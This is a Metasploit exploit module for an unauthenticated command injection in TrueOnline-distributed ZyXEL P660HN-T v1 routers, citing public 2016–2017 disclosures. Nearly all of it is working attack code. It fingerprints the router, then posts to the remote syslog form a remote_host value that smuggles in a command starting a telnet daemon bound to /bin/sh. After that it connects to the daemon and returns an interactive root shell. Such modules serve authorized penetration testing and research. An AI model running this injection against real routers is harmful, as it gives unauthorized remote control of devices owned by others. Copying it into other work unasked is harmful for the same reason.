##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection',
      'Description'    => %q{
        TrueOnline is a major ISP in Thailand, and it distributes a customized version of
        the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command
        injection vulnerability in the remote log forwarding page.
        This module was tested in an emulated environment, as the author doesn't have access to the
        Thai router any more. Any feedback should be sent directly to the module's author, as well as
        to the Metasploit project.
        There are other language strings in the firmware, so it is likely that this firmware is not only
        distributed in Thailand. Other P660HN-T v1 in other countries might be vulnerable too.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'References'     =>
        [
          ['URL', 'https://seclists.org/fulldisclosure/2017/Jan/40'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/2910']
        ],
      'Targets'        =>
        [
          [ 'P660HN-T v1', {}],
        ],
      'Privileged'     => true,
      'Arch'           => ARCH_CMD,
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'DisclosureDate'  => 'Dec 26 2016',
      'DefaultTarget'   => 0))
    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('TelnetPort', [true, "Telnet port we're going to use", 9999]),
      ])
  end

  def check
    res = send_request_cgi!({
      'uri'     => '/cgi-bin/authorize.asp',
      'method'  => 'GET'
    })
    if res && res.body =~ /ZyXEL P-660HN-T1A/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end


  def exploit
    print_status("#{peer} - Attempting to exploit router...")
    send_request_cgi({
      'uri'     => '/cgi-bin/ViewLog.asp',
      'method'  => 'POST',
      'vars_post' => {
        'remote_submit_Flag' => '1',
        'remote_syslog_Flag' => '1',
        'RemoteSyslogSupported' => '1',
        'remote_host' => ";utelnetd -l /bin/sh -p #{datastore['TelnetPort']} -d;#",
        'remoteSubmit' => 'Save'
      }
    })

    sleep 5

    begin
      ctx = { 'Msf' => framework, 'MsfExploit' => self }
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['TelnetPort'], 'Context' => ctx, 'Timeout' => 10 })
      if not sock.nil?
        print_good("#{peer} - Success, shell incoming!")
        return handler(sock)
      end
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      sock.close if sock
    end

    fail_with(Failure::Unknown, "#{peer} - Failed to exploit router.")
  end
end
